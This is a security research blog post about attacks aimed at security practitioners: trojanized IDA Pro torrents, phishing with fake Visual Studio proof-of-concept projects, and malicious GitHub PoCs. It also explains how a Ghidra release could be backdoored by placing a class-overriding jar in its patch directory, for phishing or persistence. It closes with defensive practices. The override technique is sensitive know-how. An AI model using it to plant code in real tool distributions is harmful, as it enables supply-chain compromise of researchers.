Analyzing Attack Opportunities Against Information Security Practitioners

In partnership with vx-underground, SentinelOne recently ran its first Malware Research Challenge, in which we asked researchers across the cybersecurity community to submit previously unpublished work to showcase their talents and bring their insights to a wider audience.

Today’s post is the second in a series highlighting the best entries. Jared Stroud (@DLL_Cool_J / Arch Cloud Labs) explores the risks faced by security researchers from attacks by APTs and other threat actors through compromise of security research tools. The study includes discussion of a novel attack vector through popular open-source reverse engineering platform, Ghidra.

Background

Attacks against the Information Security research community have historically ranged from fake proof-of-concept Github repos to modifying Visual Studio project data resulting in the execution of  PowerShell commands. In recent years threat actors have begun targeting software heavily used within the Information Security community. Observed targeting techniques include directly selecting individuals of the security research community through phishing campaigns or by casting a wider opportunistic net by seeding illegal software torrents. As an industry, one’s circle of trust creates an environment where the attack surface to security practitioners is unique and wider than one may think.

Sophisticated attacks are focused on those that provide much value to the Information Security community through blog posts, Youtube Channels, and other various forms of information sharing. This article will explore some of these historical attacks along with identifying the attack surface of a researcher’s toolkit as well as defensive strategies for the community for said attacks.

Historical Targeted Attacks Against Software Used by Security Practitioners

Security Company ESET reported in 2021 that threat actors linked to DPRK backdoored IDA Pro torrents via malicious DLLs within the installation folder of IDA Pro. Arch Cloud Labs does not condone the use of pirated software, but it is likely this software was chosen due to the probability of discovering additional security research on a victim’s machine. After all, why choose IDA Pro? Other actors have backdoored popular resource-intensive video game torrents to make use of GPUs for Cryptojacking campaigns. Per ESET’s tweets, upon launching IDA Pro, a scheduled task is created which downloads an additional DLL by the name of IDA Helper to fetch and execute a remotely hosted payload for follow-on post-exploitation activity.

Abusing DLL hijacking opportunities within Windows software is nothing new, but rather demonstrates the intent of the threat actor to focus on the individuals that use IDA Pro, such as security researchers. By focusing on torrent software, the threat actor also gains the security that even if an endpoint security product flags this software as malicious, the victim themselves downloading software illegally, perhaps they’ll think it’s simply something to do with the torrent, associated crack but certainly not that they’ve been targeted by a nation-state adversary.

In 2022, Google’s Threat Analytic Group (TAG) reported a targeted phishing campaign focusing on security researchers under the guise of having known security researchers aid the attacker in finalizing a proof-of-concept exploit. This proof-of-concept exploit ultimately was a Visual Studio project which executed a PowerShell command to aid in data exfiltration of a Security Researcher’s lab environment. Numerous individuals on Twitter came forward saying they had some established contact with puppet accounts that were requesting help.

Those that seek to mentor and help one another in this industry should be applauded for their efforts, but also be wary of how this can be abused in elaborate phishing campaigns such as those reported by Google TAG. It’s unlikely that these types of attacks will slow down in the coming years, and as security practitioners understanding our tools of the trade and their associated attack surface is critical in protecting ourselves as well as our research. If one looks hard enough, the ability to use a given reverse engineering or digital forensics tool to achieve living off the land types of attacks can be found. Arch Cloud Labs analyzed how these types of attacks could be applied to other widely used software such as Ghidra to enable a threat actor to target members of the security community and will demonstrate such an attack later in this article.

Opportunistic Attacks During a CVE Crisis

Academic scholars from Leiden University recently published a paper stating that 10% of proof-of-concept exploitation repos on Github contain code meant to exfiltrate sensitive data from the targeted environment. In the event a researcher’s VM is not appropriately air-gapped or isolated to an individual project, the opportunity for sensitive data loss exists. During moments of crisis such as a high-impact vulnerability (Ex: unauthenticated RCE), defenders seek to quickly understand, assess and remediate the potential impact a given vulnerability may have in their organization. This leads to researchers publishing proof-of-concept (PoC) code on GitHub for use in the wider community.

As defenders rush to Github, this creates a “watering hole” attack scenario where independent or otherwise unknown researchers have the opportunity to name a Github repo “PoC CVE-XXXX-XXXX” to gain incoming traffic for the latest vulnerability. In 2020, Andy Gill demonstrated a perfect example of this by creating a Github repo with a bash script that would Rick Roll security researchers.

When seeking to identify whether or not a Github repo is trustworthy, how do you or your research colleagues determine this? Do you audit the code or simply look at the number of stars a repo has and think “this is probably fine”? The concept of trust in PoC-exploitation is unique to the Information Security arena as outside of commercial or well-known offensive frameworks, how often is malicious software being executed in your corporate environment intentionally? Ideally never, but a framework or risk matrix for assessing a proof-of-concept legitimacy is an area that the industry has yet to fully explore.

Identifying Attack Surface of Researcher’s Tools: Case Study Ghidra

Complex software such as Visual Studio or IDA Pro contains numerous ways to achieve code execution. Understanding the tool and how its functionality can be abused is critical to understand the paths an adversary could take to leverage research environments.

Fundamentally, treating the file formats and complex archives of build systems as ways to “live off the land” like with LOLBINs, can lead to exciting new discoveries. Today, Arch Cloud Labs is demonstrating how Ghidra, a popular Reverse Engineering tool released by the National Security Agency could be leveraged for abuse in a similar vein that IDA Pro was.

Ghidra versions are regularly released via zip files located at the official Github Repo under the releases tab here. In order to backdoor Ghidra, one simply needs to place a Java .jar file that contains the same class name as a legitimate already existing Ghidra class within the following directory of the zip file ./Ghidra/patch to have the functionality be overridden. Per the README within the Ghidra patch directory:

> This directory exists so that Ghidra releases can be patched, or overridden. Classes or jar files placed in this directory will found and loaded *before* the classes that exist in the release jar files. One exception is that classes in the Utility module can not be patched in this way. The jar files will be sorted by name before being prepended to the classpath in order to have predictable class loading between Ghidra runs. This patch directory will be the very first patch entry on the classpath such that any individual classes will be found before classes in any of the patch jar files. The class files in this directory must be in the standard java package directory structure. 

The patch directory provides the adversary a unique and low-effort opportunity to ship a zip archive to an unsuspecting researcher as a part of a phishing campaign or have a second-stage payload drop additional payloads to the patch directory. To be clear, this is not an exploit but rather abusing default functionality within the Ghidra tool.

When launching a new version of Ghidra for the first time on a machine, if an entry does not exist in the .ghidra folder within the user’s home directory, a user-agreement followed by the Help menu will be displayed by the default. By identifying which Java classes are called (Ex: Help.java), this default behavior can be abused to get code to load and execute in a guaranteed fashion if the version number for the Ghidra version in the zip file is set  to a non-existent build number (ex: build id 9999.9999). This combined functionality creates a unique opportunity for a phishing campaign. This workflow is visualized below.

This modified Help.java file shown below contains a simple proof-of-concept modification to echo “pwn” to /tmp/pwn.txt.

Modified Help.java

Upon modifying the Java file, and completing the build steps outlined in the Ghida build documentation, a malicious actor can then take the compiled Jar, place it in the patch directory and ship it with a Ghidra release of their choice. Alternatively, in a post-exploitation scenario, this Jar can be placed as a means of persistence when Ghidra is launched. A more sophisticated payload is left as an exercise to the reader.

Protection Against Attacks and Validation of PoCs

Nothing listed below is ground breaking or new, but they’re practices not typically applied at the individual researcher level. After all, if these mechanisms are supposed to be applied towards enterprises for securing large organizations, why not apply them to the research community as well?

Starting with assessing your threat model for your research environment will enable you to make appropriate decisions for what additional steps need to be done to protect yourself and your organization. Accidentally executing malware never results in a good day and planning your environment and associated disaster recovery plan for these events can lead you to take steps to protect yourself. In addition to a disaster recovery plan for malware analysis environments, how can the community continuously check that these safeguards in place work? Just as the industry adopts continuous vulnerability scanning for containers, code, etc., the need for auditing custom malware/offensive security research environments is critical as well.

Secure build of materials (SBOMs) have become commonplace when discussing deploying commercial software. Having the ability to identify and map given versions of plugins, tools to associated dependencies and hashes to prevent abuse can aid the research community in avoiding malicious DLLs, JARs,  plugins, etc., being placed in software distributions. As new C2 frameworks consistently are developed and adopt code from one another, the ability to track the provenance of where scripts are being derived from will help prevent maliciously modified scripts from ending up on your test system as well as provide a way to acknowledge the original author.

Finally, commercial software is cryptographically signed, why not PoCs?  PoCs hosted on Github can have git commits signed off by an individual’s PGP key. This additional level of verification can give trusted researchers a way to verify they’re publishing tools to be trusted by the wider Information Security community. Additionally, a web of trust model for GIthub where user’s vouch for a researcher’s PoCs presents an interesting possibility to be explored.

Conclusion

As attacks become increasingly complex, the tools used to dissect and reveal the inner workings of campaigns themselves will likely be targeted. Understanding how these tools can be used beyond their intended functionality is critical to identifying advanced attacks against a given organization or group. Threat modeling the environment security research is being conducted in should ultimately be done to protect the researcher and their organization. Just as these practices are applied to enterprise organizations, they should filter down to the individual researcher.

References

Leave a Comment

Your email address will not be published. Required fields are marked *